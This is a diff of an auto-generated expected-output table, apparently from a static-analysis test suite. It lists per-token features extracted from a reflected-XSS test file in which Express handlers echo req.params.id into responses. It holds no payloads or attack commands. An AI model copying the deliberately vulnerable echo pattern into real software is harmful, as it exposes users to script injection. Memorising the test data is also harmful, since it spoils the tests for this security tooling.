| fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:33:70:34 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:33:70:34 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:33:70:34 | id | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:33:70:34 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:33:70:34 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:1:73:3 | app | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:1:73:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:1:73:3 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:1:73:7 | app.get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:1:73:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:1:73:7 | app.get | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:1:79:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:1:79:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:1:79:2 | app.get ... / OK\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:1:79:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:1:79:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:1:79:2 | exceptional return of app.get ... / OK\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:5:73:7 | get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:5:73:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:5:73:7 | get | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:9:73:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:9:73:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:9:73:19 | '/user/:id' | calleeImports | express | @@ -20657,6 +137255,36 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:9:73:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:9:73:19 | '/user/:id' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:9:73:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:21 | textContentType | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:21 | textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:21 | textContentType | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:21 | textContentType | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:21 | textContentType | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:21 | this | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:21 | this | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:21 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:22 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:22 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:22 | req | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:22 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:22 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:22 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:22 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:22 | res | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:22 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:73:22 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | 'arguments' object of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | exceptional return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | exceptional return of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | functio ... // OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | functio ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | functio ... // OK\\n} | calleeImports | express | @@ -20664,6 +137292,62 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | functio ... // OK\\n} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | functio ... // OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | return of anonymous function | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:22:79:1 | return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:32:73:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:73:37:73:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:5 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:5 | res | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:5 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:12 | res.header | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:12 | res.header | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:12 | res.header | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:12 | res.header | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:12 | res.header | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:49 | exceptional return of res.hea ... ype()}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:49 | exceptional return of res.hea ... ype()}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:49 | exceptional return of res.hea ... ype()}) | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:49 | exceptional return of res.hea ... ype()}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:49 | exceptional return of res.hea ... ype()}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:49 | res.hea ... ype()}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:49 | res.hea ... ype()}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:49 | res.hea ... ype()}) | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:49 | res.hea ... ype()}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:3:74:49 | res.hea ... ype()}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:7:74:12 | header | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:7:74:12 | header | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:7:74:12 | header | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:7:74:12 | header | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:7:74:12 | header | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:14:74:48 | {'Conte ... Type()} | CalleeFlexibleAccessPath | res.header | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:14:74:48 | {'Conte ... Type()} | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:14:74:48 | {'Conte ... Type()} | contextFunctionInterfaces | textContentType() | @@ -20672,6 +137356,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:14:74:48 | {'Conte ... Type()} | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:14:74:48 | {'Conte ... Type()} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:14:74:48 | {'Conte ... Type()} | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:28 | 'Content-Type' | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:28 | 'Content-Type' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:28 | 'Content-Type' | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:28 | 'Content-Type' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:28 | 'Content-Type' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:47 | 'Conten ... tType() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:47 | 'Conten ... tType() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:47 | 'Conten ... tType() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:47 | 'Conten ... tType() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:47 | 'Conten ... tType() | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:47 | 'Conten ... tType() | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:47 | 'Conten ... tType() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:47 | 'Conten ... tType() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:47 | 'Conten ... tType() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:15:74:47 | 'Conten ... tType() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:45 | textContentType | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:45 | textContentType | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:45 | textContentType | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:45 | textContentType | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:45 | textContentType | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:47 | exceptional return of textContentType() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:47 | exceptional return of textContentType() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:47 | exceptional return of textContentType() | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:47 | exceptional return of textContentType() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:47 | exceptional return of textContentType() | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:47 | textContentType() | CalleeFlexibleAccessPath | res.header | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:47 | textContentType() | InputAccessPathFromCallee | 0.Content-Type | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:47 | textContentType() | InputArgumentIndex | 0 | @@ -20681,6 +137390,36 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:47 | textContentType() | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:47 | textContentType() | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:74:31:74:47 | textContentType() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:75:17 | myFancyFunction | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:75:17 | myFancyFunction | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:75:17 | myFancyFunction | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:75:17 | myFancyFunction | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:75:17 | myFancyFunction | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:77:4 | exceptional return of myFancy ... OK\\n }) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:77:4 | exceptional return of myFancy ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:77:4 | exceptional return of myFancy ... OK\\n }) | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:77:4 | exceptional return of myFancy ... OK\\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:77:4 | exceptional return of myFancy ... OK\\n }) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:77:4 | myFancy ... OK\\n }) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:77:4 | myFancy ... OK\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:77:4 | myFancy ... OK\\n }) | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:77:4 | myFancy ... OK\\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:3:77:4 | myFancy ... OK\\n }) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:75:18 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:75:18 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:75:18 | req | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:75:18 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:75:18 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:75:18 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:75:18 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:75:18 | res | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:75:18 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:75:18 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | 'arguments' object of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | () => { ... OK\\n } | CalleeFlexibleAccessPath | myFancyFunction | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | () => { ... OK\\n } | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | () => { ... OK\\n } | contextFunctionInterfaces | textContentType() | @@ -20688,6 +137427,47 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | () => { ... OK\\n } | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | () => { ... OK\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | () => { ... OK\\n } | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | exceptional return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | exceptional return of anonymous function | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | exceptional return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | return of anonymous function | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:75:19:77:3 | return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:4 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:4 | res | contextSurroundingFunctionParameters | (req, res)\n() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:76:2:76:4 | res | enclosingFunctionBody | req res res header Content-Type textContentType myFancyFunction res send FOO: req params id res end FOO: req params id | +| 